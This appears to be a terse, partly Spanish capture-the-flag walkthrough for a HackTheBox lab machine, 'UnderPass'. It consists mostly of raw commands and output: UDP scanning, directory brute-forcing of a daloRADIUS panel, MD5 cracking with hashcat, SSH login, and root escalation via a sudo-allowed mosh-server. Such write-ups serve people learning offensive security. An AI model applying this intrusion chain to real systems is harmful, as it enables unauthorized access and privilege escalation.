UnderPass (UDP , TCP)

nmap -sU underpass.htb -T5 verificación SNMP

Dirbúsqueda






Grieta MD5

Escalada de privilegios

Last updated

nmap -sU underpass.htb -T5 








Last updated
Not shown: 717 closed udp ports (port-unreach), 282 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 888.71 seconds┌──(docker㉿docker)-[~/HackBox]
└─$ dirsearch -u "http://underpass.htb/daloradius/" -t 50┌──(docker㉿docker)-[~/HackBox]
└─$ dirsearch -u "http://underpass.htb/daloradius/app/" -t 50dirsearch -u "http://underpass.htb/daloradius/app/" -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ❯ dirsearch -u "http://underpass.htb/daloradius/app/" -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 220545
Output File: /home/kali/UnderPass/reports/http_underpass.htb/_daloradius_app__24-12-22_16-13-23.txt
Target: http://underpass.htb/
[16:13:23] Starting: daloradius/app/
[16:13:24] 301 - 330B - /daloradius/app/common -> http://underpass.htb/daloradius/app/common/
[16:13:24] 301 - 329B - /daloradius/app/users -> http://underpass.htb/daloradius/app/users/
[16:13:37] 301 - 333B - /daloradius/app/operators -> http://underpass.htb/daloradius/app/operators/
Task Completed ┌──(docker㉿docker)-[~/HackBox]
└─$ hashcat -m 0 -a 0 md5.txt /usr/share/wordlists/rockyou.txt412dd4759978acfcc81deab01b382403:underwat******* HACERLO TU┌──(docker㉿docker)-[~/HackBox]
└─$ ssh svcMosh@underpass.htbsvcMosh@underpass:~$ ls
user.txt
svcMosh@underpass:~$ ┌──(docker㉿docker)-[~/HackBox]
└─$ mosh --server="sudo /usr/bin/mosh-server" svcMosh@underpass.htbroot@underpass:~# ls
root.txt